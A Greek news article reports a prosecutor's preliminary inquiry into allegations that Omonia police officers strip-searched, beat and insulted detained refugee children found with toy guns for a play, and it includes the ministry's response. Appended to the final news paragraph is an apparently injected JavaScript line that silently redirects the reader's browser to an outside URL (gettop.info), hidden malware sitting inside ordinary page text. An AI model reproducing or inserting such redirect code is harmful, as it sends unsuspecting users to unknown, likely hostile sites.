Προκαταρκτική έρευνα στο ΑΤ Ομόνοιας – Καταγγελίες για κακοποίηση προσφυγόπουλων

0
8

 

Τη διενέργεια προκαταρκτικής εξέτασης για τις καταγγελίες σχετικά με παράνομη συμπεριφορά αστυνομικών του ΑΤ Ομόνοιας σε βάρος ανήλικων παιδιών προσφύγων διέταξε ο Προϊστάμενος της Εισαγγελίας Πρωτοδικών Ηλίας Ζαγοραίος με παραγγελία του στον Εισαγγελέα Γιώργο Νούλη προκειμένου να ερευνηθεί αν προκύπτουν ποινικές ευθύνες αστυνομικών.

Σύμφωνα με τα στοιχεία, στις 27 Σεπτεμβρίου πέντε ανήλικα παιδιά και δύο ενήλικες προσήχθησαν στο Τμήμα Ομόνοιας «στο πλαίσιο έρευνας πληροφοριών για οπλισμό», καθώς είχαν μαζί τους ψεύτικα όπλα-παιχνίδια για τις ανάγκες θεατρικής παράστασης που θα συμμετείχαν.

Το «Συντονιστικό Καταλήψεων Στέγης Προσφύγων – Μεταναστών/τριών» καταγγέλλει ότι στο αστυνομικό τμήμα απαγορεύτηκε στα προσαχθέντα παιδιά να χρησιμοποιήσουν τα κινητά τους, ενώ εξαναγκάστηκαν να γδυθούν κι έπειτα να κάνουν κύκλους γυμνά σε ένα μικρό δωμάτιο, υπό τα βλέμματα των αστυνομικών. Όσα, μάλιστα, αρνήθηκαν να κατεβάσουν το εσώρουχό τους, χτυπήθηκαν, εξυβρίστηκαν με σχόλια ρατσιστικού και σεξουαλικού περιεχομένου. Καταγγέλλεται επίσης, σύμφωνα με το Αθηναϊκό Πρακτορείο, ότι τα παιδιά κρατήθηκαν επί 7 ώρες, χωρίς τη δυνατότητα να πιουν νερό, ανάμεσα σε ποινικούς προσαχθέντες και χρήστες ναρκωτικών.

Από την πλευρά του το υπουργείο Προστασίας του Πολίτη με ανακοίνωσή του υποστηρίζει ότι μετά την προσαγωγή, όπου διαπιστώθηκε πως τα παιδάκια κατείχαν πλαστικά ομοιώματα όπλων, ο πατέρας ενός εκ των ανηλίκων προχώρησε στην υποβολή μήνυσης σε βάρος ενός αστυνομικού. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here